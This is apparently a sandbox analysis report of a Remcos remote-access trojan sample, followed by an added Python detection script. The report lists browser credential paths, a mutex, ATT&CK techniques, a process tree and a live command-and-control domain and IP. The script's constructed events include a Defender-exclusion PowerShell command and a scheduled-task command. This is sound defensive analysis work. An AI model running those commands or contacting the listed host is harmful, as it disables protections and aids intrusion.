Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Queries volume information: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0040A0B0 GetLocalTime,wsprintfW,16_2_0040A0B0
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_004195F8 GetUserNameW,16_2_004195F8
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,16_2_004466BF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

Source: Yara match | File source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000002.1673960846.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5684, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5292, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ZRuVeAoBoxootS.exe PID: 4680, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data16_2_0040A953
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\16_2_0040AA71
Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: \key3.db16_2_0040AA71

            Remote Access Functionality

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-6GPUH1
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-6GPUH1
            Source: Yara matchFile source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000010.00000002.1673960846.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5292, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ZRuVeAoBoxootS.exe PID: 4680, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: cmd.exe16_2_0040567A
MITRE ATT&CK Matrix

The interactive matrix did not survive extraction; the list below keeps only the cells that carried a match. The number in brackets is the count shown in that matrix cell. Template cells for techniques that were not matched (including the Linux/macOS entries such as Launchd, Cron and /etc/passwd) are omitted.

Execution: Native API (1); Command and Scripting Interpreter (1); Scheduled Task/Job (1); Service Execution (2)
Persistence: DLL Side-Loading (1); Windows Service (1); Scheduled Task/Job (1)
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (1); Process Injection (122); Scheduled Task/Job (1)
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); Timestomp (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (122)
Credential Access: OS Credential Dumping (1); Input Capture (111); Credentials In Files (2)
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (3); System Information Discovery (33); Security Software Discovery (121); Virtualization/Sandbox Evasion (31); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
Collection: Archive Collected Data (11); Input Capture (111); Clipboard Data (3)
Command and Control: Ingress Tool Transfer (12); Encrypted Channel (2); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (22)
Impact: System Shutdown/Reboot (1); Defacement (1)
Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration: no matched techniques
Behavior Graph

Behavior Graph ID: 1518542; Sample: SecuriteInfo.com.Win32.PWSX...; Startdate: 25/09/2024; Architecture: WINDOWS; Score: 100. The graph is rendered here as a process tree.

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
Contacted hosts: officerem.duckdns.org (Uses dynamic DNS services); geoplugin.net

SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe (started)
  Dropped: C:\Users\user\AppData\...\ZRuVeAoBoxootS.exe (PE32); C:\...\ZRuVeAoBoxootS.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpAAF6.tmp (XML); SecuriteInfo.com.W...n.9317.6656.exe.log (ASCII)
  Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign process
  -> SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe (second instance, started)
       Network: officerem.duckdns.org 103.186.116.145 (ports 49709, 49719, 49720; AARNET-AS-AP, Australian Academic and Research Network; country unknown); 127.0.0.1; geoplugin.net 178.237.33.50 (ports 49712, 80; ATOM86-AS ATOM86 NL; Netherlands)
       Signature: Detected Remcos RAT
  -> powershell.exe (started)
       Signature: Loading BitLocker PowerShell Module
       -> WmiPrvSE.exe (started)
       -> conhost.exe (started)
  -> powershell.exe (started)
       -> conhost.exe (started)
  -> schtasks.exe (started)
       -> conhost.exe (started)
ZRuVeAoBoxootS.exe (started)
  Signatures: Multi AV Scanner detection for dropped file; Contains functionality to change the wallpaper; Machine Learning detection for dropped file; 4 other signatures
  -> ZRuVeAoBoxootS.exe (started)
  -> schtasks.exe (started)
       -> conhost.exe (started)
  -> ZRuVeAoBoxootS.exe (started)
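The process tree and the signature sections above (the Rmc- mutex, the browser credential paths in the unpacked payload, the scheduled task registered from a dropped tmp XML, the PowerShell Defender exclusion, the DuckDNS C2 and the geoplugin.net check-in) describe a chain that can be encoded as detection logic. The following is an added example written for this page; it is neither Joe Sandbox code nor code from the sample. It assumes an EDR-style event schema (type, image, cmdline, query, dst_ip, host, path, name), a MutexCreate event type (sandboxes and some EDRs record these; Sysmon does not), and concrete schtasks and PowerShell command lines (the /XML flag and the Add-MpPreference -ExclusionPath argument) that the report does not show, only the processes, the dropped XML and the exclusion signature. The events are constructed, not captured telemetry.

```python
"""Rules for the Remcos chain in this report, run over EDR-style event records.
Added example, not Joe Sandbox output and not code from the sample; the event
schema and the exact schtasks/PowerShell command lines are assumptions."""
import base64
import re

# Indicators taken from the report on this page.
C2_DOMAIN = "officerem.duckdns.org"
C2_IP = "103.186.116.145"
GEO_HOST = "geoplugin.net"   # legitimate geolocation API that Remcos queries at start-up
MUTEX_PREFIX = "Rmc-"        # report: \Sessions\1\BaseNamedObjects\Rmc-6GPUH1
DROPPED_EXE = r"C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
TEMP_XML_RE = re.compile(r"\\AppData\\Local\\Temp\\tmp[0-9A-F]{4}\.tmp", re.I)
BROWSER_CRED_FILES = ("\\Login Data", "\\key3.db")   # paths referenced by the unpacked payload

def decoded_powershell(cmdline):
    """Plaintext of a -EncodedCommand/-enc/-e argument (base64 over UTF-16LE),
    or the command line unchanged when it carries no encoded payload."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline

def rule_task_from_temp_xml(ev):
    # schtasks registering a task from an XML dropped in %TEMP% (report: tmpAAF6.tmp, XML)
    if ev["type"] == "ProcessCreate" and ev["image"].lower().endswith("schtasks.exe"):
        if "/create" in ev["cmdline"].lower() and TEMP_XML_RE.search(ev["cmdline"]):
            return "scheduled_task_from_temp_xml", "medium"

def rule_defender_exclusion(ev):
    # PowerShell adding a Defender exclusion, also when hidden behind -EncodedCommand
    if ev["type"] == "ProcessCreate" and ev["image"].lower().endswith("powershell.exe"):
        if re.search(r"Add-MpPreference\s+-ExclusionPath", decoded_powershell(ev["cmdline"]), re.I):
            return "defender_exclusion_added", "high"

def rule_remcos_mutex(ev):
    if ev["type"] == "MutexCreate" and ev["name"].rsplit("\\", 1)[-1].startswith(MUTEX_PREFIX):
        return "remcos_mutex", "high"

def rule_network(ev):
    if ev["type"] == "DnsQuery" and (ev["query"] == C2_DOMAIN or ev["query"].endswith(".duckdns.org")):
        return "dynamic_dns_c2_lookup", "high"
    if ev["type"] == "NetworkConnect":
        if ev["dst_ip"] == C2_IP:
            return "c2_connection", "high"
        if ev.get("host") == GEO_HOST:
            return "geoplugin_checkin", "info"   # benign service; meaningful only with other hits

def rule_browser_credential_files(ev):
    if ev["type"] == "FileRead" and ev["path"].endswith(BROWSER_CRED_FILES):
        return "browser_credential_file_read", "high"

RULES = [rule_task_from_temp_xml, rule_defender_exclusion, rule_remcos_mutex,
         rule_network, rule_browser_credential_files]
SPECIFIC = {"remcos_mutex", "dynamic_dns_c2_lookup", "c2_connection"}

def assess(events):
    """Run every rule over every event. 'remcos_chain' needs a Remcos-specific hit
    plus two further non-informational stages, so a lone geoplugin.net lookup
    (common in benign software) never alerts on its own."""
    hits = {}
    for ev in events:
        for rule in RULES:
            result = rule(ev)
            if result:
                hits[result[0]] = result[1]
    specific = SPECIFIC & set(hits)
    supporting = {name for name, sev in hits.items() if sev != "info"} - specific
    if specific and len(supporting) >= 2:
        verdict = "remcos_chain"
    elif specific or supporting:
        verdict = "suspicious"
    else:
        verdict = "no_alert"
    return {"verdict": verdict, "hits": hits}

def encode_powershell(script):
    """The -EncodedCommand form PowerShell expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed events mirroring the report's process tree; not captured telemetry.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /TN "ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp"'},
    {"type": "ProcessCreate", "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand "
                + encode_powershell(r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming"')},
    {"type": "MutexCreate", "image": DROPPED_EXE, "name": r"\Sessions\1\BaseNamedObjects\Rmc-6GPUH1"},
    {"type": "DnsQuery", "image": DROPPED_EXE, "query": C2_DOMAIN},
    {"type": "NetworkConnect", "image": DROPPED_EXE, "dst_ip": C2_IP},
    {"type": "NetworkConnect", "image": DROPPED_EXE, "dst_ip": "178.237.33.50", "host": GEO_HOST},
    {"type": "FileRead", "image": DROPPED_EXE,
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
]

if __name__ == "__main__":
    print(assess(SAMPLE_EVENTS))
```

Two design points matter in practice. The Defender-exclusion rule decodes -EncodedCommand before matching, because the report's signature names a Base64-encoded MpPreference cmdlet and a plaintext-only string match would miss it. The geoplugin.net request is scored as informational rather than blocked: it is a legitimate geolocation API that many benign programs also call, so it is useful only as corroboration next to the Rmc- mutex, the DuckDNS lookup or the C2 IP, and blocking the host outright would create noise without removing the RAT's ability to operate.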

Antivirus, Machine Learning and Genetic Malware Detection

Initial sample (Source: Detection, Scanner):
SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe: 21%, ReversingLabs
SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe: 100%, Joe Sandbox ML

Dropped files:
C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe: 100%, Joe Sandbox ML
C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe: 21%, ReversingLabs

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches

URLs (Source: Detection, Scanner, Label):
http://geoplugin.net/json.gp: 0%, URL Reputation, safe
http://geoplugin.net/json.gp/C: 0%, URL Reputation, safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name: 0%, URL Reputation, safe
http://geoplugin.net/json.gp8: 0%, Avira URL Cloud, safe
http://geoplugin.net/json.gpB: 0%, Avira URL Cloud, safe
127.0.0.1: 0%, Avira URL Cloud, safe

Domains (Name: IP, Active, Malicious, Reputation):
geoplugin.net: 178.237.33.50, active, not malicious, reputation unknown
officerem.duckdns.org: 103.186.116.145, active, malicious, reputation unknown

Contacted URLs (Name: Malicious, Antivirus Detection, Reputation):
http://geoplugin.net/json.gp: not malicious; URL Reputation: safe; reputation unknown
127.0.0.1: malicious; Avira URL Cloud: safe; reputation unknown

URLs found in memory (Name: Source, Malicious, Antivirus Detection, Reputation):
http://geoplugin.net/json.gpB: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp; not malicious; Avira URL Cloud: safe; reputation unknown
